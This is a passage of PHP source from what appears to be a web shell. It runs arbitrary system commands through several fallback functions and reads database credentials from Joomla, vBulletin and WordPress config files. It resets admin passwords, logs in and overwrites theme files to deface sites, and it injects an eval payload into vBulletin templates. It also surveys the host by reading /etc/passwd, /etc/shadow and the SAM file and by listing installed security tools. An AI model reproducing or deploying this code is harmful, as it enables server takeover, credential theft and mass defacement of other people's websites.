1068 echo '<font >failed to inject '.$dir . '/' . $object.'<BR></font>';
1069 }
1070 }
1071 }
1072 }
1073 }
1074 }
1075 function rrmdir($dir)
1076 {
1077 if (is_dir($dir)) // ensures that we actually have a directory
1078 {
1079 $objects = scandir($dir); // gets all files and folders inside
1080 foreach ($objects as $object)
1081 {
1082 if ($object != '.' && $object != '..')
1083 {
1084 if (is_dir($dir . '/' . $object))
1085 {
1086 // if we find a directory, do a recursive call
1087 rrmdir($dir . '/' . $object);
1088 }
1089 else
1090 {
1091 // if we find a file, simply delete it
1092 unlink($dir . '/' . $object);
1093 }
1094 }
1095 }
1096 // the original directory is now empty, so delete it
1097 rmdir($dir);
1098 }
1099 }
1100
1101 function which($pr)
1102 {
1103 $path = execmd("which $pr");
1104 if(!empty($path))
1105 return trim($path);
1106 else
1107 return trim($pr);
1108 }
1109
1110 function magicboom($text)
1111 {
1112 if (!get_magic_quotes_gpc())
1113 return $text;
1114 return stripslashes($text);
1115 }
1116 function perlshell($command)
1117 {
1118 $perl=new perl();
1119 ob_start();
1120 $perl->eval("system('".$command."')");
1121 $exec=ob_get_contents();
1122 ob_end_clean();
1123 return $exec;
1124}
1125function execmd($cmd,$d_functions="None")
1126{
1127 if($d_functions=="None")
1128 {
1129 $ret=passthru($cmd);
1130 return $ret;
1131 }
1132 $funcs=array("shell_exec","exec","passthru","system","popen","perl_func");
1133 $d_functions=str_replace(" ","",$d_functions);
1134 $dis_funcs=explode(",",$d_functions);
1135 foreach($funcs as $safe)
1136 {
1137 if(!in_array($safe,$dis_funcs))
1138 {
1139 if($safe=="exec")
1140 {
1141 $ret=@exec($cmd);
1142 $ret=join("\n",$ret);
1143 return $ret;
1144 }
1145 elseif($safe=="system")
1146 {
1147 $ret=@system($cmd);
1148 return $ret;
1149 }
1150 elseif($safe=="passthru")
1151 {
1152 $ret=@passthru($cmd);
1153 return $ret;
1154 }
1155 elseif($safe=="shell_exec")
1156 {
1157 $ret=@shell_exec($cmd);
1158 return $ret;
1159 }
1160 elseif($safe=="popen")
1161 {
1162 $ret=@popen("$cmd",'r');
1163 if(is_resource($ret))
1164 {
1165 while(@!feof($ret))
1166 $read.=@fgets($ret);
1167 @pclose($ret);
1168 return $read;
1169 }
1170 return -1;
1171 }
1172 elseif($safe="proc_open")
1173 {
1174 $cmdpipe=array(
1175 0=>array('pipe','r'),
1176 1=>array('pipe','w')
1177 );
1178 $resource=@proc_open($cmd,$cmdpipe,$pipes);
1179 if(@is_resource($resource))
1180 {
1181 while(@!feof($pipes[1]))
1182 $ret.=@fgets($pipes[1]);
1183 @fclose($pipes[1]);
1184 @proc_close($resource);
1185 return $ret;
1186 }
1187 return -1;
1188 }
1189 elseif($safe=="perl_func")
1190 {
1191 $ret=perlshell($command);
1192 return $ret;
1193 }
1194 }
1195 }
1196 return -1;
1197}
1198 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
1199 {
1200 $ar0=explode($marqueurDebutLien, $text);
1201 $ar1=explode($marqueurFinLien, $ar0[$i]);
1202 return trim($ar1[0]);
1203 }
1204 function changeindexjo($conf,$h,$site)
1205 {
1206 global $defcount;
1207 $dol = '$';
1208 $sitename = entre2v2($conf,$dol."sitename = '","';");
1209 $username = entre2v2($conf,$dol."user = '","';");
1210 $password = entre2v2($conf,$dol."password = '","';");
1211 $dbname = entre2v2($conf,$dol."db = '","';");
1212 $prefix = entre2v2($conf,$dol."dbprefix = '","';");
1213 $localhost = entre2v2($conf,$dol."host = '","';");
1214
1215 $co=randomt();
1216
1217 $link=mysql_connect($localhost,$username,$password) ;
1218 mysql_select_db($dbname,$link);
1219
1220 $tryChaningInfo = mysql_query("UPDATE ".$prefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
1221
1222 $req =mysql_query("SELECT * from `".$prefix."extensions` ");
1223
1224 if ( $req )
1225 {
1226 $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
1227 $data = mysql_fetch_array($req);
1228 $template_name=$data["template"];
1229
1230 $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
1231 $data = mysql_fetch_array($req);
1232 $template_id=$data["extension_id"];
1233
1234 $url2 = $site_url =$site."/administrator/index.php";
1235
1236 $ch = curl_init();
1237 curl_setopt($ch, CURLOPT_URL, $url2);
1238 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1239 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1240 curl_setopt($ch, CURLOPT_HEADER, 1);
1241 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1242 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1243 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1244
1245 $buffer = curl_exec($ch);
1246
1247 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
1248 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
1249
1250 $url2=$site_url."/index.php";
1251 $ch = curl_init();
1252 curl_setopt($ch, CURLOPT_URL, $url2);
1253 curl_setopt($ch, CURLOPT_POST, 1);
1254 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
1255 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1256 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1257 curl_setopt($ch, CURLOPT_HEADER, 0);
1258 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1259 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1260 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1261 $buffer = curl_exec($ch);
1262 echo "<tr align =center>";
1263 echo '<td>admin : 123456789</td>';
1264 $pos = strpos($buffer,"com_config");
1265 if($pos === false)
1266 echo("<td>[-] Login Error</td>");
1267 else
1268 echo("<td><font class=txt>[+] Login Success</font></td>");
1269
1270 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
1271 $ch = curl_init();
1272 curl_setopt($ch, CURLOPT_URL, $url2);
1273 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1274 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1275 curl_setopt($ch, CURLOPT_HEADER, 0);
1276 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1277 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1278 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1279 $buffer = curl_exec($ch);
1280
1281 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
1282
1283 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1284
1285 $ch = curl_init();
1286 curl_setopt($ch, CURLOPT_URL, $url2);
1287 curl_setopt($ch, CURLOPT_POST, 1);
1288 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
1289
1290 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1291 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1292 curl_setopt($ch, CURLOPT_HEADER, 0);
1293 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1294 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1295 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1296 $buffer = curl_exec($ch);
1297
1298 $pos = strpos($buffer,'<dd class="message message">');
1299 if($pos === false)
1300 {
1301 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Defaced</td>");
1302 }
1303 else
1304 {
1305 $defcount++;
1306 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1307 }
1308 }
1309 else
1310 {
1311 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
1312 $data = mysql_fetch_array($req);
1313 $template_name=$data["template"];
1314
1315 $url2=$site_url."/index.php";
1316 $ch = curl_init();
1317 curl_setopt($ch, CURLOPT_URL, $url2);
1318 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1319 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1320 curl_setopt($ch, CURLOPT_HEADER, 1);
1321 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1322 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1323 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1324 $buffer = curl_exec($ch);
1325
1326 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
1327
1328 $url2=$site_url."/index.php";
1329 $ch = curl_init();
1330 curl_setopt($ch, CURLOPT_URL, $url2);
1331 curl_setopt($ch, CURLOPT_POST, 1);
1332 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
1333 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1334 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1335 curl_setopt($ch, CURLOPT_HEADER, 0);
1336 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1337 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1338 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1339 $buffer = curl_exec($ch);
1340
1341 $pos = strpos($buffer,"com_config");
1342 echo "<tr align =center>";
1343 echo '<td>admin : 123456789</td>';
1344 if($pos === false)
1345 echo("<td>[-] Login Error</td>");
1346 else
1347 echo("<td><font class=txt>[+] Login Success</font></td>");
1348
1349 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
1350 $ch = curl_init();
1351 curl_setopt($ch, CURLOPT_URL, $url2);
1352 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1353 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1354 curl_setopt($ch, CURLOPT_HEADER, 0);
1355 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1356 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1357 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1358 $buffer = curl_exec($ch);
1359
1360 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
1361
1362 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1363 $ch = curl_init();
1364 curl_setopt($ch, CURLOPT_URL, $url2);
1365 curl_setopt($ch, CURLOPT_POST, 1);
1366 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
1367 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1368 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1369 curl_setopt($ch, CURLOPT_HEADER, 0);
1370 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1371 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1372 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1373 $buffer = curl_exec($ch);
1374
1375 $pos = strpos($buffer,'<dd class="message message fade">');
1376 if($pos === false)
1377 {
1378 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Deface</td>");
1379 }
1380 else
1381 {
1382 $defcount++;
1383 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1384 }
1385 }
1386 echo "</tr>";
1387 }
1388 function changeindexvb($conf,$index)
1389 {
1390 $dol = '$';
1391
1392 $username = entre2v2($conf,"['MasterServer']['username'] = '","';");
1393 $password = entre2v2($conf,"['MasterServer']['password'] = '","';");
1394 $dbname = entre2v2($conf,"se']['dbname'] = '","';");
1395 $prefix = entre2v2($conf,"['Database']['tableprefix'] = '","';");
1396 $localhost = entre2v2($conf,"['MasterServer']['servername'] = '","';");
1397
1398 $con =@ mysql_connect($localhost,$username,$password);
1399 $db =@ mysql_select_db($dbname,$con);
1400 $ss = mysql_query("SELECT * from `".$prefix."setting` WHERE varname='bburl'");
1401 $data = mysql_fetch_array($ss);
1402
1403 echo "<tr align=center>";
1404 $index=str_replace('"','\\"',$index);
1405 $attack = "{\${eval(base64_decode(\'";
1406 $attack .= base64_encode("echo \"$index\";");
1407 $attack .= "\'))}}{\${exit()}}</textarea>";
1408 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1409 $result =@ mysql_query($query,$con);
1410 if($result)
1411 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><font class=txt><blink>Vbulletin Forum Defaced Successfully</blink></font></td>";
1412 else
1413 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><blink>Cannot Deface Vbulletin Forum</blink></td>";
1414 echo "<tr>";
1415 }
1416 function changeindexwp($conf,$index)
1417 {
1418 $index = urlencode($index);
1419 $dol = '$';
1420 $username = entre2v2($conf,"define('DB_USER', '","');");
1421 $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
1422 $dbname = entre2v2($conf,"define('DB_NAME', '","');");
1423 $prefix = entre2v2($conf,$dol."table_prefix = '","'");
1424 $host = entre2v2($conf,"define('DB_HOST', '","');");
1425 $con =@ mysql_connect($host,$username,$password);
1426 $db =@ mysql_select_db($dbname,$con);
1427 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
1428
1429 if($req1)
1430 {
1431 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1432 $data = mysql_fetch_array($req);
1433 $site_url=$data["option_value"];
1434
1435 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
1436 $data = mysql_fetch_array($req);
1437 $template = $data["option_value"];
1438
1439 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
1440 $data = mysql_fetch_array($req);
1441 $current_theme = $data["option_value"];
1442
1443 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
1444 $url2=$site_url."/wp-login.php";
1445
1446 $ch = curl_init();
1447 curl_setopt($ch, CURLOPT_URL, $url2);
1448 curl_setopt($ch, CURLOPT_POST, 1);
1449 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
1450 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1451 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1452 curl_setopt($ch, CURLOPT_HEADER, 0);
1453 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
1454 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1455 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1456 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1457 $buffer = curl_exec($ch);
1458
1459 $pos = strpos($buffer,"action=logout");
1460
1461 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
1462 curl_setopt($ch, CURLOPT_URL, $url2);
1463 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
1464 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1465 curl_setopt($ch, CURLOPT_HEADER, 0);
1466 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1467 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1468 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1469 $buffer0 = curl_exec($ch);
1470
1471 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
1472 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
1473
1474 if(substr_count($_file,"index.php") != 0)
1475 $output .= "<tr align =center>";
1476 $url2=$site_url."/wp-admin/theme-editor.php";
1477 curl_setopt($ch, CURLOPT_URL, $url2);
1478 curl_setopt($ch, CURLOPT_POST, 1);
1479 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
1480 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1481 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1482 curl_setopt($ch, CURLOPT_HEADER, 0);
1483 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1484 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1485 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1486 $buffer = curl_exec($ch);
1487 curl_close($ch);
1488 $pos = strpos($buffer,'<div id="message" class="updated">');
1489 $cond = 0;
1490 if($pos === false)
1491 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td>Cannot Deface</td>";
1492 else
1493 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td><font class=txt>Wordpress Defaced Successfully</font></td>";
1494 }
1495 else
1496 $output.= "<td colspan=2> DB Error</td>";
1497 echo $output."</tr>";
1498 global $base_path;
1499 unlink($base_path.'COOKIE.txt');
1500 }
1501 function getDisabledFunctions()
1502 {
1503 if(!ini_get('disable_functions'))
1504 {
1505 return "None";
1506 }
1507 else
1508 {
1509 return @ini_get('disable_functions');
1510 }
1511 }
1512 function getFilePermissions($file)
1513 {
1514 $perms = fileperms($file);
1515
1516 if (($perms & 0xC000) == 0xC000) {
1517 // Socket
1518 $info = 's';
1519 } elseif (($perms & 0xA000) == 0xA000) {
1520 // Symbolic Link
1521 $info = 'l';
1522 } elseif (($perms & 0x8000) == 0x8000) {
1523 // Regular
1524 $info = '-';
1525 } elseif (($perms & 0x6000) == 0x6000) {
1526 // Block special
1527 $info = 'b';
1528 } elseif (($perms & 0x4000) == 0x4000) {
1529 // Directory
1530 $info = 'd';
1531 } elseif (($perms & 0x2000) == 0x2000) {
1532 // Character special
1533 $info = 'c';
1534 } elseif (($perms & 0x1000) == 0x1000) {
1535 // FIFO pipe
1536 $info = 'p';
1537 } else {
1538 // Unknown
1539 $info = 'u';
1540 }
1541
1542 // Owner
1543 $info .= (($perms & 0x0100) ? 'r' : '-');
1544 $info .= (($perms & 0x0080) ? 'w' : '-');
1545 $info .= (($perms & 0x0040) ?
1546 (($perms & 0x0800) ? 's' : 'x' ) :
1547 (($perms & 0x0800) ? 'S' : '-'));
1548
1549 // Group
1550 $info .= (($perms & 0x0020) ? 'r' : '-');
1551 $info .= (($perms & 0x0010) ? 'w' : '-');
1552 $info .= (($perms & 0x0008) ?
1553 (($perms & 0x0400) ? 's' : 'x' ) :
1554 (($perms & 0x0400) ? 'S' : '-'));
1555
1556 // World
1557 $info .= (($perms & 0x0004) ? 'r' : '-');
1558 $info .= (($perms & 0x0002) ? 'w' : '-');
1559 $info .= (($perms & 0x0001) ?
1560 (($perms & 0x0200) ? 't' : 'x' ) :
1561 (($perms & 0x0200) ? 'T' : '-'));
1562
1563 return $info;
1564}
1565 function filepermscolor($filename)
1566 {
1567 if(!@is_readable($filename))
1568 return "<font class=readperm>".getFilePermissions($filename)."</font>";
1569 else if(!@is_writable($filename))
1570 return "<font class=noperm>".getFilePermissions($filename)."</font>";
1571 else
1572 return "<font class=wrtperm>".getFilePermissions($filename)."</font>";
1573 }
1574
1575 function yourip()
1576 {
1577 echo $_SERVER["REMOTE_ADDR"];
1578 }
1579 function phpver()
1580 {
1581 $pv=@phpversion();
1582 echo $pv;
1583 }
1584 function magic_quote()
1585 {
1586 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"OFF";
1587 }
1588 function serverip()
1589 {
1590 echo @gethostbyname($_SERVER["HTTP_HOST"]);
1591 }
1592 function serverport()
1593 {
1594 echo $_SERVER['SERVER_PORT'];
1595 }
1596 function safe()
1597 {
1598 global $sm;
1599 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
1600 }
1601 function serveradmin()
1602 {
1603 echo $_SERVER['SERVER_ADMIN'];
1604 }
1605 function systeminfo()
1606 {
1607 echo php_uname();
1608 }
1609 function curlinfo()
1610 {
1611 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("Disabled");
1612 }
1613 function oracleinfo()
1614 {
1615 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("Disabled");
1616 }
1617 function mysqlinfo()
1618 {
1619 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1620 }
1621 function mssqlinfo()
1622 {
1623 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1624 }
1625 function postgresqlinfo()
1626 {
1627 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1628 }
1629 function softwareinfo()
1630 {
1631 echo getenv("SERVER_SOFTWARE");
1632 }
1633 function download()
1634 {
1635 $frd=$_GET['download'];
1636 $prd=explode("/",$frd);
1637 for($i=0;$i<sizeof($prd);$i++)
1638 {
1639 $nfd=$prd[$i];
1640 }
1641 @ob_clean();
1642 header("Content-type: application/octet-stream");
1643 header("Content-length: ".filesize($nfd));
1644 header("Content-disposition: attachment; filename=\"".$nfd."\";");
1645 readfile($nfd);
1646
1647 exit;
1648
1649 }
1650
1651 function HumanReadableFilesize($size)
1652 {
1653 $mod = 1024;
1654 $units = explode(' ','B KB MB GB TB PB');
1655 for ($i = 0; $size > $mod; $i++)
1656 {
1657 $size /= $mod;
1658 }
1659 return round($size, 2) . ' ' . $units[$i];
1660 }
1661
1662 function showDrives()
1663 {
1664 global $self;
1665 foreach(range('A','Z') as $drive)
1666 {
1667 if(is_dir($drive.':\\'))
1668 {
1669 $myd = $drive.":\\";
1670 ?>
1671 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
1672 <?php echo $myd; ?>
1673 </a>
1674 <?php
1675 }
1676 }
1677 }
1678 function diskSpace()
1679 {
1680 global $dir;
1681 return disk_total_space($dir);
1682 }
1683 function freeSpace()
1684 {
1685 global $dir;
1686 return disk_free_space($dir);
1687 }
1688
1689 function thiscmd($p)
1690 {
1691 $path = myexe('which ' . $p);
1692 if(!empty($path))
1693 return $path;
1694 return false;
1695 }
1696
1697 function mysecinfo()
1698 {
1699 function myparam($n, $v)
1700 {
1701 $v = trim($v);
1702 if($v)
1703 {
1704 echo '<span><font size=3>' . $n . ': </font></span>';
1705 if(strpos($v, "\n") === false)
1706 echo '<font class=txt size=3>' . $v . '</font><br>';
1707 else
1708 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1709 }
1710 }
1711
1712 myparam('Server software', @getenv('SERVER_SOFTWARE'));
1713 if(function_exists('apache_get_modules'))
1714 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
1715 myparam('Open base dir', @ini_get('open_basedir'));
1716 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1717 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1718 $temp=array();
1719 if(function_exists('mysql_get_client_info'))
1720 $temp[] = "MySql (".mysql_get_client_info().")";
1721 if(function_exists('mssql_connect'))
1722 $temp[] = "MSSQL";
1723 if(function_exists('pg_connect'))
1724 $temp[] = "PostgreSQL";
1725 if(function_exists('oci_connect'))
1726 $temp[] = "Oracle";
1727 myparam('Supported databases', implode(', ', $temp));
1728 echo '<br>';
1729
1730 if($GLOBALS['os'] == 'Linux') {
1731 myparam('Distro : ', myexe("cat /etc/*-release"));
1732 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
1733 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
1734 myparam('OS version', @file_get_contents('/proc/version'));
1735 myparam('Distro name', @file_get_contents('/etc/issue.net'));
1736 myparam('Where is Perl?', myexe('whereis perl'));
1737 myparam('Where is Python?', myexe('whereis python'));
1738 myparam('Where is gcc?', myexe('whereis gcc'));
1739 myparam('Where is apache?', myexe('whereis apache'));
1740 myparam('CPU?', myexe('cat /proc/cpuinfo'));
1741 myparam('RAM', myexe('free -m'));
1742 myparam('Mount options', myexe('cat /etc/fstab'));
1743 myparam('User Limits', myexe('ulimit -a'));
1744
1745
1746 if(!$GLOBALS['safe_mode']) {
1747 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1748 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1749 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1750 echo '<br>';
1751 $temp=array();
1752 foreach ($userful as $item)
1753 if(thiscmd($item))
1754 $temp[] = $item;
1755 myparam('Userful', implode(', ',$temp));
1756 $temp=array();
1757 foreach ($danger as $item)
1758 if(thiscmd($item))
1759 $temp[] = $item;
1760 myparam('Danger', implode(', ',$temp));
1761 $temp=array();
1762 foreach ($downloaders as $item)
1763 if(thiscmd($item))
1764 $temp[] = $item;
1765 myparam('Downloaders', implode(', ',$temp));
1766 echo '<br/>';
1767 myparam('HDD space', myexe('df -h'));
1768 myparam('Hosts', @file_get_contents('/etc/hosts'));
1769
1770 }
1771 } else {
1772 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
1773 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
1774 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
1775 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
1776 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
1777 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
1778 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
1779 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
1780 myparam('OS Version',myexe('ver'));
1781 myparam('Account Settings',myexe('net accounts'));
1782 myparam('User Accounts',myexe('net user'));
1783 }
1784 echo '</div>';
1785 }
1786
1787
1788
1789 function myexe($in)
1790 {
1791 $out = '';
1792 if (function_exists('exec')) {
1793 @exec($in,$out);
1794 $out = @join("\n",$out);
1795 } elseif (function_exists('passthru')) {
1796 ob_start();
1797 @passthru($in);
1798 $out = ob_get_clean();
1799 } elseif (function_exists('system')) {
1800 ob_start();
1801 @system($in);
1802 $out = ob_get_clean();
1803 } elseif (function_exists('shell_exec')) {
1804 $out = shell_exec($in);
1805 } elseif (is_resource($f = @popen($in,"r"))) {
1806 $out = "";
1807 while(!@feof($f))
1808 $out .= fread($f,1024);
1809 pclose($f);
1810 }
1811 return $out;
1812}
1813function exec_all($command)
1814 {
1815
1816 $output = '';
1817 if(function_exists('exec'))
1818 {
1819 exec($command,$output);
1820 $output = join("\n",$output);
1821 }
1822
1823 else if(function_exists('shell_exec'))
1824 {
1825 $output = shell_exec($command);
1826 }
1827
1828 else if(function_exists('popen'))
1829 {
1830 $handle = popen($command , "r"); // Open the command pipe for reading
1831 if(is_resource($handle))
1832 {
1833 if(function_exists('fread') && function_exists('feof'))
1834 {
1835 while(!feof($handle))
1836 {
1837 $output .= fread($handle, 512);
1838 }
1839 }
1840 else if(function_exists('fgets') && function_exists('feof'))
1841 {
1842 while(!feof($handle))
1843 {
1844 $output .= fgets($handle,512);
1845 }
1846
1847
1848
1849 }
1850 }
1851 pclose($handle);
1852 }
1853
1854
1855 else if(function_exists('system'))
1856 {
1857 ob_start(); //start output buffering
1858 system($command);
1859 $output = ob_get_contents(); // Get the ouput
1860 ob_end_clean(); // Stop output buffering
1861 }
1862
1863 else if(function_exists('passthru'))
1864 {
1865 ob_start(); //start output buffering
1866 passthru($command);
1867 $output = ob_get_contents(); // Get the ouput
1868 ob_end_clean(); // Stop output buffering
1869 }
1870
1871 else if(function_exists('proc_open'))
1872 {
1873 $descriptorspec = array(
1874 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
1875 );
1876 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1877 if(is_resource($handle))
1878 {
1879 if(function_exists('fread') && function_exists('feof'))
1880 {
1881 while(!feof($pipes[1]))
1882 {
1883 $output .= fread($pipes[1], 512);
1884 }
1885 }
1886 else if(function_exists('fgets') && function_exists('feof'))
1887 {
1888 while(!feof($pipes[1]))
1889 {
1890 $output .= fgets($pipes[1],512);
1891 }
1892 }
1893 }
1894 pclose($handle);
1895 }
1896
1897 return(htmlspecialchars($output));
1898
1899}
1900
1901$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"OFF";
1902$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
1903
1904function getOGid($value)
1905{
1906 if(!function_exists('posix_getegid')) {
1907 $user = @get_current_user();
1908 $uid = @getmyuid();
1909 $gid = @getmygid();
1910 $group = "?";
1911 $owner = $uid . "/". $gid;
1912 return $owner;
1913 } else {
